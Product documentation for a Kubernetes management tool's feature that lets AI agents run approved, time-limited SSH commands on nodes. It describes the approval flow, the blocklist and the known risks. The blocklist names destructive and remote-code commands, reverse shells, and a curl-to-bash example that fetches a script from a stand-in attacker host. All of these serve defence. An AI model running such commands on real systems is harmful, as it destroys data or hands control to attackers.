Node SSH Access
How AI agents get time-limited SSH access to your nodes, the security model, known risks, and what you should prepare before enabling it
PodWarden lets AI agents request SSH access to your Kubernetes nodes for troubleshooting. This page explains exactly how it works, what can go wrong, and what you need to do to stay safe.
Read this entire page before enabling Node SSH Access on any MCP token.
Why this exists
AI agents connected via MCP are effective at managing workloads, but some problems require looking at the node itself — checking journalctl logs, inspecting kubectl output from a specific node, diagnosing network issues with ip or ss, checking disk usage. Without SSH access, the agent has to describe the commands and you have to run them manually.
Node SSH Access lets the agent run these commands directly, but only after you explicitly approve each session in a live-monitored dashboard.
Consider run_in_pod first. For tasks inside application containers — fixing PVC permissions, running app CLI tools, checking config files, debugging connectivity — use run_in_pod instead. It requires no approval ceremony, no SSH grants, and is isolated to the container. Only use Node SSH Access for node-level operations like journalctl, systemctl, or ip addr. See Agent Best Practices for a comparison.
The full lifecycle
Here is exactly what happens, step by step:
Step-by-step breakdown
- Agent requests access. The AI calls request_node_access(host_id, reason, duration). PodWarden creates a pending grant and returns an approval URL.
- Agent gives you the URL. The AI cannot approve its own request. It presents the URL and waits.
- You open the URL. The approval page shows:
  - Which host and cluster the agent wants to access
  - The agent's stated reason
  - Which MCP token is requesting access
  - The session duration (default 5 minutes, max 60 minutes)
  - A summary of what commands are allowed and blocked
  - A link to this documentation page
- You log in fresh. PodWarden requires recent authentication (within 2 minutes) to approve. If you're using OIDC/Keycloak, you'll be prompted to log in again. If you're using local auth, you'll need a fresh sign-in. This prevents approval by stale browser sessions.
- You approve. The grant becomes active. The page transitions to a live monitoring dashboard.
- Agent runs commands. Each command is validated against the blocklist before execution. You see every command, its output, and whether it was allowed or blocked, in real time via server-sent events.
- Session ends. After the configured duration (or when you click Revoke), the grant expires. No more commands can be executed. The dashboard shows a summary of everything that happened.
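The lifecycle above can be pictured as a small state machine. The following Python sketch is illustrative only: the Grant class, its field names, and the state strings are assumptions made for this example, not PodWarden's actual implementation. The timing values (10-minute pending expiry, 5-minute default and 60-minute maximum session) are the ones stated on this page.

```python
from dataclasses import dataclass
from typing import Optional

PENDING_TTL_S = 10 * 60        # pending grants expire after 10 minutes
DEFAULT_DURATION_S = 5 * 60    # default session length
MAX_DURATION_S = 60 * 60       # maximum session length


@dataclass
class Grant:
    """Hypothetical model of one SSH access grant (names are assumptions)."""
    host_id: str
    reason: str
    created_at: float
    duration_s: int = DEFAULT_DURATION_S
    approved_at: Optional[float] = None
    revoked: bool = False

    def __post_init__(self) -> None:
        if not 0 < self.duration_s <= MAX_DURATION_S:
            raise ValueError("duration must be between 1 second and 60 minutes")

    def approve(self, now: float) -> None:
        # Only a grant that is still pending can be approved.
        if self.state(now) != "pending":
            raise RuntimeError("grant is no longer pending")
        self.approved_at = now

    def revoke(self) -> None:
        self.revoked = True

    def state(self, now: float) -> str:
        if self.revoked:
            return "revoked"
        if self.approved_at is None:
            expired = now - self.created_at >= PENDING_TTL_S
            return "expired" if expired else "pending"
        expired = now - self.approved_at >= self.duration_s
        return "expired" if expired else "active"

    def can_run_commands(self, now: float) -> bool:
        # Commands are accepted only while the grant is active.
        return self.state(now) == "active"
```

In this sketch, time is passed in explicitly (seconds since any fixed origin), which keeps the expiry rules easy to test without waiting for real clocks.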
What the agent can and cannot do
Allowed
The agent can run single commands or commands piped to safe filters:
- kubectl get pods -A, kubectl describe node k3s-1, kubectl logs deployment/myapp
- journalctl -u k3s --since "1 hour ago" --no-pager
- systemctl status k3s, systemctl status containerd
- crictl ps, crictl images, crictl logs
- df -h, free -m, top -bn1, ps aux, uptime, lsblk
- ip addr, ip route, ss -tlnp, ping -c3 10.0.0.1
- cat /etc/k3s/config.yaml, ls /var/lib/rancher/k3s/
- Any command piped to: grep, head, tail, wc, sort, awk, sed, jq, cut, uniq, tr, column, cat, xargs
Blocked
These patterns are blocked before the command reaches SSH:
| Category | Examples | Why |
|---|---|---|
| Destructive file ops | rm -r, mkfs, dd if=, wipefs | Could destroy data or filesystems |
| System control | reboot, shutdown, poweroff, init 0 | Could take the node offline |
| User management | passwd, useradd, userdel | Could create backdoor accounts |
| Permission changes | chmod 777, chown -R | Could weaken file security |
| K8s destructive | kubeadm reset, k3s-uninstall, k3s-agent-uninstall | Could destroy the cluster |
| Network destructive | iptables -F, ip link delete | Could break networking |
| Service stopping | systemctl stop/disable/mask sshd/k3s/networking | Could lock you out |
| Remote code exec | curl \| sh, wget \| sh, python -c, perl -e, eval | Could execute arbitrary code |
| Reverse shells | nc -l, nc -e | Could open backdoor connections |
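To make "pattern-based" concrete, here is a minimal Python sketch of a regex blocklist covering a few rows of the table above. The patterns, the BLOCKED_PATTERNS name, and the find_block_reason function are all assumptions written for illustration; PodWarden's real patterns are not reproduced here and may differ.

```python
import re

# Illustrative patterns only; each one mirrors a row in the table above.
BLOCKED_PATTERNS = [
    (re.compile(r"\brm\s+-\w*r"), "destructive file operation"),
    (re.compile(r"\b(mkfs|wipefs)\b|\bdd\s+if="), "destructive file operation"),
    (re.compile(r"\b(reboot|shutdown|poweroff)\b|\binit\s+0\b"), "system control"),
    (re.compile(r"\b(passwd|useradd|userdel)\b"), "user management"),
    (re.compile(r"\biptables\s+-F\b|\bip\s+link\s+delete\b"), "network destructive"),
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "remote code execution"),
    (re.compile(r"\bnc\s+-\w*[le]"), "reverse shell"),
]


def find_block_reason(command: str):
    """Return the category of the first matching pattern, or None if allowed."""
    for pattern, category in BLOCKED_PATTERNS:
        if pattern.search(command):
            return category
    return None
```

Matching of this kind is deliberately blunt. In this sketch, for example, the user-management pattern would also reject cat /etc/passwd, because it looks at text rather than at what the command would actually do.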
Blocked shell operators
These shell features are blocked entirely:
- Command chaining (;, &&, ||): prevents running multiple commands in sequence
- Command substitution ($(...), `...`): prevents embedding commands inside commands
- Redirection (>, <, >>): prevents writing to files on the node
Pipes (|) are allowed, but only into the restricted set of filter commands listed under Allowed (grep, head, tail, jq, etc.).
Single-quoted strings are safe. Operators inside single quotes are treated as literal text, not shell syntax. This means commands like kubectl get cm -o jsonpath='{.data.config}' or kubectl patch deploy --type merge -p '{"spec":{"replicas":2}}' work correctly — the {, $, and other characters inside the single quotes are not flagged as blocked operators.
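The operator and pipe rules can be sketched as a single pass over the command text that tracks whether the scanner is inside single quotes. This Python example is a simplified illustration under stated assumptions: the function names are hypothetical, only the operators listed above are checked, and the real validator may handle more cases.

```python
SAFE_PIPE_TARGETS = {
    "grep", "head", "tail", "wc", "sort", "awk", "sed", "jq",
    "cut", "uniq", "tr", "column", "cat", "xargs",
}


def split_pipeline(command: str):
    """Split on unquoted '|' and reject blocked operators.

    Returns the list of pipeline stages. Raises ValueError when a blocked
    operator appears outside single quotes.
    """
    stages, current = [], []
    in_single = False
    i = 0
    while i < len(command):
        ch = command[i]
        if ch == "'":
            in_single = not in_single
            current.append(ch)
        elif in_single:
            current.append(ch)  # literal text, never treated as an operator
        elif command.startswith(("&&", "||", "$("), i):
            raise ValueError(f"blocked operator {command[i:i + 2]!r}")
        elif ch in ";`<>":
            raise ValueError(f"blocked operator {ch!r}")
        elif ch == "|":
            stages.append("".join(current).strip())
            current = []
        else:
            current.append(ch)
        i += 1
    if in_single:
        raise ValueError("unterminated single quote")
    stages.append("".join(current).strip())
    return stages


def validate(command: str) -> bool:
    """True when operators and pipe targets pass the rules described above."""
    try:
        stages = split_pipeline(command)
    except ValueError:
        return False
    if not all(stages):
        return False  # empty stage, for example a trailing pipe
    # Every stage after the first must start with an allowed filter.
    return all(stage.split()[0] in SAFE_PIPE_TARGETS for stage in stages[1:])
```

With this sketch, kubectl get cm -o jsonpath='{.data.config}' passes because the braces sit inside single quotes, while kubectl get pods; reboot fails on the unquoted semicolon.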
Security model
What we trust
- Your PodWarden instance. The API server runs the command validation and SSH execution. If someone compromises your PodWarden instance, they already have your SSH keys and don't need this feature.
- The SSH key. PodWarden uses the same SSH key it already uses for provisioning. Node SSH Access does not introduce new credentials — it uses existing ones in a more controlled way.
- The blocklist. Command validation happens server-side before SSH execution. The AI agent never sees or controls the SSH connection directly.
What we do NOT trust
- The AI agent. The agent submits commands as text strings. PodWarden treats every command as potentially hostile and validates it against the blocklist. The agent cannot bypass validation because it never gets direct SSH access — it only gets an API endpoint that happens to run SSH commands after validation.
- The MCP token. Having an MCP token with node_ssh_access=enabled only lets the agent create pending grants. A human must still approve each session.
- The approval URL. It's a one-time-use link to a pending grant. Opening it doesn't approve anything; you still need to authenticate and click approve.
The approval ceremony
The fresh-login requirement exists because SSH approval should be a deliberate act, not something that happens because you left a browser tab open. The 2-minute window on JWT freshness means:
- You must actively log in to approve
- A compromised browser session from yesterday cannot approve grants
- If you walk away from your computer, pending grants expire in 10 minutes
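A freshness rule like this reduces to comparing the token's issue time with the current time. The sketch below assumes the check is made against the standard JWT iat (issued-at) claim and that signature verification has already happened elsewhere; the function name and the handling of future-dated tokens are assumptions for illustration.

```python
import time
from typing import Optional

FRESHNESS_WINDOW_S = 120  # "within 2 minutes", as described above


def is_fresh_login(iat: float, now: Optional[float] = None) -> bool:
    """Check whether a login is recent enough to approve a grant.

    iat is the JWT issued-at claim, in seconds since the epoch.
    """
    if now is None:
        now = time.time()
    age = now - iat
    # Reject tokens dated in the future as well as stale ones.
    return 0 <= age <= FRESHNESS_WINDOW_S
```

A session token issued yesterday fails this check no matter how valid it otherwise is, which is the property the approval ceremony relies on.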
Known attack vectors
We are transparent about what could go wrong. These are the scenarios we've identified and how we mitigate them, but you should evaluate these risks for your own environment.
1. Blocklist bypass
Risk: The blocklist is pattern-based (regex). A sufficiently creative command could bypass it.
Examples of what the blocklist catches: rm -rf /, reboot, curl http://evil.com/script.sh | bash
Examples that could theoretically bypass it: A command that uses an obscure binary already on the node, or a kubectl exec into a pod that then runs destructive commands inside the container.
Mitigation: The blocklist is defense-in-depth, not the sole security boundary. The real security boundaries are:
- The human must approve each session
- You watch every command in real time
- Sessions expire quickly (default 5 minutes)
- You can revoke instantly
What you should do: Understand that the blocklist reduces risk but does not eliminate it. If the agent runs a command you don't recognize, revoke the session immediately.
2. Indirect command execution
Risk: Allowed commands like kubectl exec could be used to run arbitrary commands inside a pod, which then affects the node (e.g., a privileged pod).
Mitigation: This is a Kubernetes security concern, not specific to this feature. If your pods run as privileged or have host mounts, they're already a risk vector regardless of how the kubectl command arrives.
What you should do: Follow Kubernetes security best practices — don't run pods as privileged, use Pod Security Standards, minimize host mounts. These are good practices regardless of whether you use Node SSH Access.
3. Information exfiltration
Risk: The agent can read files and command output. It could read sensitive data (secrets in environment variables, config files with credentials, etc.) and include them in its response to you — which may be logged by the AI provider.
Mitigation: This is inherent to giving any SSH access. The blocklist prevents writing/modifying, but reading is allowed by design (that's the whole point of troubleshooting).
What you should do:
- Be aware that command output flows through the AI provider's API
- Don't approve SSH access to nodes with sensitive data you wouldn't share with the AI provider
- Use Kubernetes secrets (not environment variables) for sensitive values
- Consider what's on the node before approving
4. MCP token theft
Risk: If an attacker steals an MCP token with node_ssh_access=enabled, they can create pending grants and then use social engineering to get you to open and approve the resulting URL.
Mitigation:
- Pending grants expire in 10 minutes
- Fresh authentication is required to approve
- The approval page shows which MCP token is requesting access — if you don't recognize it, deny
- Revoke compromised tokens immediately (Settings -> MCP -> trash icon)
What you should do: Treat MCP tokens like API keys. Don't share them. Rotate them periodically. Use the minimum number of tokens with SSH access enabled.
5. Session duration abuse
Risk: The agent requests a long session (up to 60 minutes) and runs many commands that you can't review fast enough.
Mitigation: Approval is your decision. If the requested duration seems too long, deny the request and ask the agent to request a shorter session. You can also revoke at any time.
What you should do: Start with short durations (5 minutes). Only approve longer sessions when you understand what the agent needs to do. Keep the monitoring dashboard visible.
6. SSH key scope
Risk: The SSH key used for this feature is the same key PodWarden uses for provisioning. If a command exploit leads to key extraction, the attacker has the provisioning key.
Mitigation: The key is written to a temporary file for each command execution and deleted immediately after. The agent never sees the key — only command output.
What you should do: Use separate SSH keys per host where possible (Settings -> Secrets -> SSH key pairs, then assign per host). This limits blast radius if any single key is compromised.
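The write-then-delete handling of the key described in the mitigation can be sketched as follows. This is an assumption-laden illustration, not PodWarden's code: run_with_temp_key and its argv_for_key parameter are hypothetical names, and the 30-second timeout is arbitrary.

```python
import os
import subprocess
import tempfile


def run_with_temp_key(private_key: str, argv_for_key):
    """Write the key to a private temp file, run a command, then delete the file.

    argv_for_key is a callable that receives the key path and returns the
    argument list to execute, for example:
        lambda path: ["ssh", "-i", path, "user@host", "uptime"]
    """
    # mkstemp creates the file readable and writable only by the current user.
    fd, path = tempfile.mkstemp(prefix="key-")
    try:
        with os.fdopen(fd, "w") as handle:
            handle.write(private_key)
        return subprocess.run(
            argv_for_key(path), capture_output=True, text=True, timeout=30
        )
    finally:
        os.remove(path)  # removed even if the command fails or times out
```

The caller only ever receives the completed process result (exit code, stdout, stderr), never the key path, which matches the statement that the agent sees command output only.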
Before you enable this
Checklist
- You understand the risks. Read the attack vectors above. This feature gives AI agents controlled access to run commands on your infrastructure.
- You have monitoring in place. The live dashboard is your primary control. Don't approve and walk away.
- You can recover. Know how to restore your nodes if something goes wrong. Have backups. Know how to re-provision a node with PodWarden if it gets into a bad state.
- You've limited the blast radius.
  - Enable node_ssh_access on as few MCP tokens as possible
  - Use dedicated SSH keys per host
  - Keep session durations short
- You trust the AI provider. Command output passes through the AI provider's API. If your nodes contain data you can't share with the provider, don't approve SSH access to those nodes.
- You know how to revoke. Both from the monitoring dashboard (big red button) and from the MCP token settings page (revoke the entire token).
Enabling Node SSH Access
Per-token toggle
Node SSH Access is disabled by default on all MCP tokens. To enable it:
- Go to Settings -> MCP
- Find the token in the table
- Toggle the SSH column switch to on (green)
This only allows the token to request access. A human must still approve each session.
Disabling
Toggle the switch back to off, or revoke the token entirely. Any active grants from that token will continue until they expire — they are not retroactively revoked when you disable the token setting. To immediately stop an active session, use the Revoke button on the monitoring dashboard.
Monitoring a session
When you approve an SSH access grant, the page becomes a live monitoring dashboard:
- Countdown timer shows remaining time with a progress bar. Turns red when under 60 seconds.
- Revoke button immediately terminates the session. Always visible.
- Command log shows every command the agent submits:
  - Green border: command succeeded (exit code 0)
  - Amber border: command ran but returned a non-zero exit code
  - Red background: command was blocked by the validation rules
  - Each entry shows the command, execution time, stdout, and stderr
The log auto-scrolls to the latest entry. After the session ends, the log remains visible as an audit record for that browser tab.
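The colour coding of log entries amounts to a three-way classification. As a rough sketch, with a hypothetical function name and style labels chosen only for this example:

```python
from typing import Optional


def log_entry_style(blocked: bool, exit_code: Optional[int]) -> str:
    """Map a command result to the dashboard style described above."""
    if blocked:
        return "red-background"   # rejected by validation, never executed
    if exit_code == 0:
        return "green-border"     # ran and succeeded
    return "amber-border"         # ran but returned a non-zero exit code
```

Blocked is checked first because a blocked command never runs and therefore has no exit code to inspect.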
FAQ
Can the agent approve its own request?
No. Approval requires a JWT from a human admin who logged in within the last 2 minutes. MCP tokens cannot approve grants.
What happens if my browser closes during an active session?
The session continues until it expires. The agent can still run commands. You can reopen the approval URL to reconnect to the monitoring stream. To stop the session early, reopen the URL and click Revoke.
Are commands logged permanently?
No. Grants and their command logs are stored in memory only. They're cleaned up 1 hour after the session ends. If PodWarden restarts, all grants are lost. For permanent audit trails, use the MCP Activity Log, which records all API calls, including command executions.
Can I restrict which hosts the agent can access?
Currently, any host in PodWarden can be requested. The control is at the approval step — you decide whether to approve each request based on the target host. Per-host restrictions may be added in a future release.
What if the agent requests access and I'm not available?
Pending grants expire after 10 minutes. The agent will get an expiry notice and would need to request again when you're available.
Does this work without OIDC/Keycloak?
Yes. If you use local authentication (username/password), the approval page redirects to the local sign-in page. The fresh-login requirement still applies — your JWT must have been issued within the last 2 minutes.
Can multiple agents have active sessions on the same node?
Yes. Each grant is independent. This is by design for cases where you might have different agents troubleshooting different issues. Each session has its own monitoring dashboard.